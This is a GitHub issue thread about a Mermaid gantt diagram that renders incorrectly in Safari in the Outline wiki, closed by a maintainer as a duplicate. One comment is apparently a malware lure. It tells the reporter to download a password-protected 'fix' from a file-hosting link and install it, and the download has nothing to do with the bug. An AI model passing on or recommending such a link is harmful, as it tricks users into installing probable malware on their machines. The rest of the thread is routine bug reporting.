### ISSUE TITLE
Mermaid gantt error on safari 

### ISSUE THREAD

**Issue by HHHHhgqcdxhg** [outline/outline#7465] opened 2024-08-27 03:10 UTC
maybe should update mermaid.js from 9 to 11?  

create a Mermaid Diagram in outline, and paste:  

```
gantt
title 2024-9-28
dateFormat  DD-HH:mm
axisFormat %d-%H:%M
tickInterval 1hour
section someSection
    someEvent: 09-28-19:30, 2h
```

**Expected behavior**
<img width="755" alt="image" src="https://github.com/user-attachments/assets/4feac259-d3fc-4210-94fc-797569f6d04a">  
it work well on Chrome on macos 😊

**Screenshots**
<img width="776" alt="image" src="https://github.com/user-attachments/assets/9e47bdec-8e8c-4947-bb29-4c8195da8c86">  
not well on safari on macos 😟
also not well on safari on ios, safari on ipados

**Outline (please complete the following information):**
- Install: selfhosted by docker.getoutline.com/outlinewiki/outline:0.78.0
- Version: 0.78.0

**Desktop (please complete the following information):**
 - OS: macos
 - Browser safari
 - Version sonoma 14.5

**Mobile (please complete the following information):**
 - Device: ipad pro 2020
 - OS: ipados 17.5.1
 - Browser safari

**Comment by amir1387aht** [comment] 2024-08-27 03:11
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tommoor** [comment] 2024-08-27 03:14
Closing as duplicate of #7228 – Mermaid upgrade will happen eventually, but it's already covered in many other discussions and PR's.

thx!

**Closed by tommoor** 2024-08-27 03:14 UTC
Labels: bug
